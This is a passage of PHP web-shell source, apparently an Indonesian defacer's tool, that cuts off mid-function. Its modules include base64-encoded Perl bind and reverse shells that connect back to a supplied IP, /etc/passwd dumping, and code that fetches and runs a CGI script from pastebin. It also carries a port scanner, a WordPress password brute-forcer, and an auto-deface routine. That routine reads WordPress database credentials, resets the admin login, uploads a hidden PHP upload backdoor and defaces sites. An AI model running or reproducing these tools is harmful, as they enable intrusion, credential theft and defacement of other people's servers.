1500. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1501. continue;
1502. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1503. <td align=center><font class=txt>" . $matches . "</td>";
1504. echo "<td align=center><font class=txt><a href=$full/L0LZ666H05T_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1505. $dcount++;}
1506. fclose($file);
1507. echo "</table></div></center>";unlink("test.txt");
1508. } else
1509. echo "<center><font size=3>Cannot create Symlink</font></center>";
1510. }
1511. }
1512. }
1513. ////////////////////
1514. elseif($_GET['do'] == 'backconnect') {
1515. echo "<center>";
1516. echo "<form method='post'>
1517. <u>Bind Port:</u> <br>
1518. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1519. <input type='submit' name='sub_bp' value='&#10149;'>
1520. </form>
1521. <form method='post'>
1522. <u>Back Connect:</u> <br>
1523. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1524. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1525. <input type='submit' name='sub_bc' value='&#10149;'>
1526. </form>";
1527. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1528. if(isset($_POST['sub_bp'])) {
1529. $f_bp = fopen("/tmp/bp.pl", "w");
1530. fwrite($f_bp, base64_decode($bind_port_p));
1531. fclose($f_bp);
1532.  
1533. $port = $_POST['port_bind'];
1534. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1535. sleep(1);
1536. echo "<pre>".$out."n".exe("ps aux | grep bp.pl")."</pre>";
1537. unlink("/tmp/bp.pl");
1538. }
1539. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1540. if(isset($_POST['sub_bc'])) {
1541. $f_bc = fopen("/tmp/bc.pl", "w");
1542. fwrite($f_bc, base64_decode($bind_connect_p));
1543. fclose($f_bc);
1544.  
1545. $ipbc = $_POST['ip_bc'];
1546. $port = $_POST['port_bc'];
1547. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1548. sleep(1);
1549. echo "<pre>".$out."n".exe("ps aux | grep bc.pl")."</pre>";
1550. unlink("/tmp/bc.pl");
1551. }
1552. } elseif($_GET['do'] == 'kill') {
1553. if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
1554. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
1555. else
1556. echo '<center>unlink failed!</center>';
1557. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1558. }elseif($_GET['do'] == 'ports') {
1559. echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
1560. echo '<div class="content">';
1561. echo '<form action="" method="post">';
1562.  
1563. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1564. $start = strip_tags($_POST['start']);
1565. $end = strip_tags($_POST['end']);
1566. $host = strip_tags($_POST['host']);
1567. for($i = $start; $i<=$end; $i++){
1568. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1569. if($fp){
1570. echo 'Port '.$i.' is <font color=green>open</font><br>';
1571. }
1572. flush();
1573. }
1574. } else {
1575. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1576. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1577. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1578. Host: <input type="text" name="host" value="localhost"/><br /><br />
1579. Port start: <input type="text" name="start" value="0"/><br /><br />
1580. Port end:<input type="text" name="end" value="5000"/><br /><br />
1581. <input type="submit" value="Scan Ports" />
1582. </form></center><br /><br />';
1583. echo '</div></table></td>';
1584.  
1585. }
1586. }
1587. /////////////////////////////
1588. elseif($_GET['do'] == 'wpbf') {
1589.  
1590. echo "<title>Wp-Brute Force</title>";
1591.  
1592. include("../head.php");
1593.  
1594.  
1595.  
1596. set_time_limit(0);
1597. error_reporting(0);
1598.  
1599. class lugi{
1600.  
1601. private $host;
1602. private $user;
1603. private $open;
1604. private $lista;
1605.  
1606. public function banner() {
1607. echo(" <html>
1608. <head>
1609. <style type='text/css'>
1610.  
1611. textarea {
1612. width: 100%;
1613. height: 400px;
1614. }
1615.  
1616.  
1617. .ext{
1618. color: blue;
1619. }
1620.  
1621. .area{
1622. width:400px;
1623. height:350px;
1624. resize:none;
1625. }
1626.  
1627. </style>
1628. </head>
1629. <body>
1630. <h1><center>WordPress Brute Force</center></h1>
1631. <form action='' method='POST'>
1632. <center>Host:<input type='text' name='host' class='con7' placeholder='http://tager.com/' size='40' > </center><br>
1633. <center>User:<input type='text' name='user' class='con7' value='admin' size='25'> </center><br>
1634. <center>Wordlist</center>
1635. <center><textarea class='form-control con7' rows='10' name='lista'></textarea><br><br><center>
1636. <center><input type='Submit' style='width:100%;' value='Start'></center>
1637. </form>
1638. </body>
1639. </html>");
1640.  
1641. }
1642.  
1643. public function extract_post() {
1644. $this->host = $_POST["host"];
1645. $this->user = $_POST["user"];
1646. $this->open = $_POST["lista"];
1647. }
1648.  
1649. public function Xregex() {
1650. if(preg_match("@/wp-login.php@", $this->host)) {
1651. return true;
1652. } else {
1653. $this->host = $_POST["host"]."/wp-login.php";
1654. }
1655. }
1656.  
1657. public function brute() {
1658. $lista = array_filter(explode("\n", $this->open));
1659. foreach($lista as $this->lista) {
1660. for($i=0; $i < count($this->lista); $i++) {
1661. $this->Xcurl();
1662. }
1663. }
1664. }
1665.  
1666. private function cool() {
1667. echo "[+] Host:"."<font color='white'>{$this->host}</font>";
1668. echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
1669. echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
1670. }
1671.  
1672. private function Xcurl() {
1673. $curl = curl_init();
1674. curl_setopt($curl, CURLOPT_URL, $this->host);
1675. curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
1676. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
1677. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
1678. curl_setopt($curl, CURLOPT_POST, true);
1679. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
1680. $exec = curl_exec($curl);
1681. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
1682. $this->cool();
1683. if($http == 302) {
1684. echo "<font color='green'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
1685. break;
1686. } else {
1687. echo "<font color='red'><br/>[+] Failed</font><br>";
1688. }
1689. curl_close($curl);
1690. }
1691. }
1692.  
1693. $wp = new lugi();
1694. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
1695. $wp->banner();
1696. $wp->extract_post();
1697. $wp->Xregex();
1698. $wp->brute();
1699.  
1700. echo "<br>";
1701.  
1702.  
1703. }
1704.  
1705.  
1706. ////////////////////////////
1707. elseif($_GET['do'] == 'csrf') {
1708. ?> <html>
1709. <title>CSRF EXPLOITER ONLINE</title>
1710. <center><br><br><h2> CSRF ONLINE</h2>
1711. <br><br>
1712. <font color=lime>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
1713. <center>
1714. <form method="post">
1715. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
1716. POST File: <input type="text" name="data" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
1717. <input type="submit" name="go" value="Lock!">
1718. </form>
1719. <?php
1720. $url = $_POST['url'];
1721. $data = $_POST['data'];
1722. $submit = $_POST['go'];
1723. if($submit) {
1724. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input type='submit' name='ok' value='Upload'></form";
1725. }
1726. ?>
1727. </form>
1728. </html>
1729. <?php
1730.  
1731. }
1732.  
1733. /////////////
1734. elseif ($_GET['do'] == 'hashid'){
1735. if(isset($_POST['gethash'])){
1736. $hash = $_POST['hash'];
1737. if(strlen($hash)==32){
1738. $hashresult = "MD5 Hash";
1739. }elseif(strlen($hash)==40){
1740. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
1741. }elseif(strlen($hash)==13){
1742. $hashresult = "DES(Unix) Hash";
1743. }elseif(strlen($hash)==16){
1744. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
1745. }elseif(strlen($hash)==41){
1746. $GetHashChar = substr($hash, 40);
1747. if($GetHashChar == "*"){
1748. $hashresult = "MySQL5 Hash";
1749. }
1750. }elseif(strlen($hash)==64){
1751. $hashresult = "SHA-256 Hash";
1752. }elseif(strlen($hash)==96){
1753. $hashresult = "SHA-384 Hash";
1754. }elseif(strlen($hash)==128){
1755. $hashresult = "SHA-512 Hash";
1756. }elseif(strlen($hash)==34){
1757. if(strstr($hash, '$1$')){
1758. $hashresult = "MD5(Unix) Hash";
1759. }
1760. }elseif(strlen($hash)==37){
1761. if(strstr($hash, '$apr1$')){
1762. $hashresult = "MD5(APR) Hash";
1763. }
1764. }elseif(strlen($hash)==34){
1765. if(strstr($hash, '$H$')){
1766. $hashresult = "MD5(phpBB3) Hash";
1767. }
1768. }elseif(strlen($hash)==34){
1769. if(strstr($hash, '$P$')){
1770. $hashresult = "MD5(Wordpress) Hash";
1771. }
1772. }elseif(strlen($hash)==39){
1773. if(strstr($hash, '$5$')){
1774. $hashresult = "SHA-256(Unix) Hash";
1775. }
1776. }elseif(strlen($hash)==39){
1777. if(strstr($hash, '$6$')){
1778. $hashresult = "SHA-512(Unix) Hash";
1779. }
1780. }elseif(strlen($hash)==24){
1781. if(strstr($hash, '==')){
1782. $hashresult = "MD5(Base-64) Hash";
1783. }
1784. }else{
1785. $hashresult = "Hash type not found";
1786. }
1787. }else{
1788. $hashresult = "Not Hash Entered";
1789. }
1790.  
1791. ?>
1792. <center><br><Br><br>
1793.  
1794. <form action="" method="POST">
1795. <tr>
1796. <table class="tabnet">
1797. <th colspan="5">Hash Identification</th>
1798. <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
1799. <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
1800. </table></tr></form>
1801. </center>
1802.  
1803. <?php
1804. }
1805.  
1806. ///////////////////////
1807. elseif($_GET['do'] == 'passwbypass') {
1808. echo '<center>Bypass etc/passw With:<br>
1809. <table style="width:50%">
1810. <tr>
1811. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
1812. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
1813. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
1814. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
1815. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
1816. </tr></table>Bypass User With : <table style="width:50%">
1817. <tr>
1818. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
1819. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
1820. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
1821. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
1822. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
1823. </tr>
1824. </table><br>';
1825.  
1826.  
1827. if ($_POST['awkuser']) {
1828. echo"<textarea class='inputzbut' cols='65' rows='15'>";
1829. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
1830. echo "</textarea><br>";
1831. }
1832. if ($_POST['systuser']) {
1833. echo"<textarea class='inputzbut' cols='65' rows='15'>";
1834. echo system("ls /var/mail");
1835. echo "</textarea><br>";
1836. }
1837. if ($_POST['passthuser']) {
1838. echo"<textarea class='inputzbut' cols='65' rows='15'>";
1839. echo passthru("ls /var/mail");
1840. echo "</textarea><br>";
1841. }
1842. if ($_POST['exuser']) {
1843. echo"<textarea class='inputzbut' cols='65' rows='15'>";
1844. echo exec("ls /var/mail");
1845. echo "</textarea><br>";
1846. }
1847. if ($_POST['shexuser']) {
1848. echo"<textarea class='inputzbut' cols='65' rows='15'>";
1849. echo shell_exec("ls /var/mail");
1850. echo "</textarea><br>";
1851. }
1852. if($_POST['syst'])
1853. {
1854. echo"<textarea class='inputz' cols='65' rows='15'>";
1855. echo system("cat /etc/passwd");
1856. echo"</textarea><br><br><b></b><br>";
1857. }
1858. if($_POST['passth'])
1859. {
1860. echo"<textarea class='inputz' cols='65' rows='15'>";
1861. echo passthru("cat /etc/passwd");
1862. echo"</textarea><br><br><b></b><br>";
1863. }
1864. if($_POST['ex'])
1865. {
1866. echo"<textarea class='inputz' cols='65' rows='15'>";
1867. echo exec("cat /etc/passwd");
1868. echo"</textarea><br><br><b></b><br>";
1869. }
1870. if($_POST['shex'])
1871. {
1872. echo"<textarea class='inputz' cols='65' rows='15'>";
1873. echo shell_exec("cat /etc/passwd");
1874. echo"</textarea><br><br><b></b><br>";
1875. }
1876. echo '<center>';
1877. if($_POST['melex'])
1878. {
1879. echo"<textarea class='inputz' cols='65' rows='15'>";
1880. for($uid=0;$uid<60000;$uid++){
1881. $ara = posix_getpwuid($uid);
1882. if (!empty($ara)) {
1883. while (list ($key, $val) = each($ara)){
1884. print "$val:";
1885. }
1886. print "n";
1887. }
1888. }
1889. echo"</textarea><br><br>";
1890. }
1891. }
1892. /////////////////////////////
1893. elseif($_GET['do'] == 'cgi') {
1894. $cgi_dir = mkdir('idx_cgi', 0755);
1895. $file_cgi = "idx_cgi/cgi.izo";
1896. $isi_htcgi = "AddHandler cgi-script .izo";
1897. $htcgi = fopen(".htaccess", "w");
1898. fwrite($htcgi, $isi_htcgi);
1899. fclose($htcgi);
1900. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1901. $cgi = fopen($file_cgi, "w");
1902. fwrite($cgi, $cgi_script);
1903. fclose($cgi);
1904. chmod($file_cgi, 0755);
1905. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1906. } elseif($_GET['do'] == 'fake_root') {
1907. ob_start();
1908. $cwd = getcwd();
1909. $ambil_user = explode("/", $cwd);
1910. $user = $ambil_user[2];
1911. if($_POST['reverse']) {
1912. $site = explode("rn", $_POST['url']);
1913. $file = $_POST['file'];
1914. foreach($site as $url) {
1915. $cek = getsource("$url/~$user/$file");
1916. if(preg_match("/hacked/i", $cek)) {
1917. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1918. }
1919. }
1920. } else {
1921. echo "<center><form method='post'>
1922. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1923. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1924. Domain: <br>
1925. <textarea style='width: 450px; height: 250px;' name='url'>";
1926. reverse($_SERVER['HTTP_HOST']);
1927. echo "</textarea><br>
1928. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1929. </form><br>
1930. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1931. }
1932. } elseif($_GET['do'] == 'adminer') {
1933. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1934. function adminer($url, $isi) {
1935. $fp = fopen($isi, "w");
1936. $ch = curl_init();
1937. curl_setopt($ch, CURLOPT_URL, $url);
1938. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1939. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1940. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1941. curl_setopt($ch, CURLOPT_FILE, $fp);
1942. return curl_exec($ch);
1943. curl_close($ch);
1944. fclose($fp);
1945. ob_flush();
1946. flush();
1947. }
1948. if(file_exists('adminer.php')) {
1949. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1950. } else {
1951. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1952. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1953. } else {
1954. echo "<center><font color=red>gagal buat file adminer</font></center>";
1955. }
1956. }
1957. } elseif($_GET['do'] == 'auto_dwp') {
1958. if($_POST['auto_deface_wp']) {
1959. function anucurl($sites) {
1960. $ch = curl_init($sites);
1961. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1962. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1963. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1964. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1965. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1966. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1967. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1968. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1969. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1970. $data = curl_exec($ch);
1971. curl_close($ch);
1972. return $data;
1973. }
1974. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1975. $post = array(
1976. "log" => "$userr",
1977. "pwd" => "$pass",
1978. "rememberme" => "forever",
1979. "wp-submit" => "$wp_submit",
1980. "redirect_to" => "$web",
1981. "testcookie" => "1",
1982. );
1983. $ch = curl_init($cek);
1984. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1985. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1986. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1987. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1988. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1989. curl_setopt($ch, CURLOPT_POST, 1);
1990. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1991. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1992. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1993. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1994. $data = curl_exec($ch);
1995. curl_close($ch);
1996. return $data;
1997. }
1998. $scan = $_POST['link_config'];
1999. $link_config = scandir($scan);
2000. $script = htmlspecialchars($_POST['script']);
2001. $user = "nusantarablackhat";
2002. $pass = "nusantarablackhat";
2003. $passx = md5($pass);
2004. foreach($link_config as $dir_config) {
2005. if(!is_file("$scan/$dir_config")) continue;
2006. $config = file_get_contents("$scan/$dir_config");
2007. if(preg_match("/WordPress/", $config)) {
2008. $dbhost = ambilkata($config,"DB_HOST', '","'");
2009. $dbuser = ambilkata($config,"DB_USER', '","'");
2010. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2011. $dbname = ambilkata($config,"DB_NAME', '","'");
2012. $dbprefix = ambilkata($config,"table_prefix = '","'");
2013. $prefix = $dbprefix."users";
2014. $option = $dbprefix."options";
2015. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2016. $db = mysql_select_db($dbname);
2017. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2018. $result = mysql_fetch_array($q);
2019. $id = $result[ID];
2020. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2021. $result2 = mysql_fetch_array($q2);
2022. $target = $result2[option_value];
2023. if($target == '') {
2024. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2025. } else {
2026. echo "[+] $target <br>";
2027. }
2028. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2029. if(!$conn OR !$db OR !$update) {
2030. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2031. mysql_close($conn);
2032. } else {
2033. $site = "$target/wp-login.php";
2034. $site2 = "$target/wp-admin/theme-install.php?upload";
2035. $b1 = anucurl($site2);
2036. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2037. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2038. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2039. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2040. $www = "m.php";
2041. $fp5 = fopen($www,"w");
2042. fputs($fp5,$upload3);
2043. $post2 = array(
2044. "_wpnonce" => "$anu2",
2045. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2046. "themezip" => "@$www",
2047. "install-theme-submit" => "Install Now",
2048. );
2049. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2050. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2051. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2052. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2053. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2054. curl_setopt($ch, CURLOPT_POST, 1);
2055. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2056. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2057. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2058. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2059. $data3 = curl_exec($ch);
2060. curl_close($ch);
2061. $y = date("Y");
2062. $m = date("m");
2063. $namafile = "id.php";
2064. $fpi = fopen($namafile,"w");
2065. fputs($fpi,$script);
2066. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2067. curl_setopt($ch6, CURLOPT_POST, true);
2068. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2069. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2070. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2071. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2072. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2073. $postResult = curl_exec($ch6);
2074. curl_close($ch6);
2075. $as = "$target/k.php";
2076. $bs = anucurl($as);
2077. if(preg_match("#$script#is", $bs)) {
2078. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2079. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2080. } else {
2081. echo "[-] <font color='red'>gagal mepes...</font><br>";
2082. echo "[!!] coba aja manual: <br>";
2083. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2084. echo "[+] username: <font color=lime>$user</font><br>";
2085. echo "[+] password: <font color=lime>$pass</font><br><br>";
2086. }
2087. mysql_close($conn);
2088. }
2089. }
2090. }
2091. } else {
2092. echo "<center><h1>WordPress Auto Deface</h1>
2093. <form method='post'>
2094. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2095. <input type='text' name='script' height='10' size='50' placeholder='Hacked by L0LZ666H05T' required><br>
2096. <input type='submit' style='width: 29%;' name='auto_deface_wp' value='Hajar!!'>
2097. </form>
2098. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2099. </center>";
2100. }
2101. } elseif($_GET['do'] == 'auto_dwp2') {
2102. if($_POST['auto_deface_wp']) {
2103. function anucurl($sites) {
2104. $ch = curl_init($sites);
2105. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2106. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2107. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2108. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2109. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2110. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2111. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2112. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2113. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2114. $data = curl_exec($ch);
2115. curl_close($ch);
2116. return $data;
2117. }
2118. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2119. $post = array(
2120. "log" => "$userr",
2121. "pwd" => "$pass",
2122. "rememberme" => "forever",
2123. "wp-submit" => "$wp_submit",
2124. "redirect_to" => "$web",
2125. "testcookie" => "1",
2126. );
2127. $ch = curl_init($cek);
2128. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2129. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2130. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2131. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2132. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2133. curl_setopt($ch, CURLOPT_POST, 1);
2134. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2135. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2136. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2137. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2138. $data = curl_exec($ch);
2139. curl_close($ch);
2140. return $data;
2141. }
2142. $link = explode("\r\n", $_POST['link']);
2143. $script = htmlspecialchars($_POST['script']);
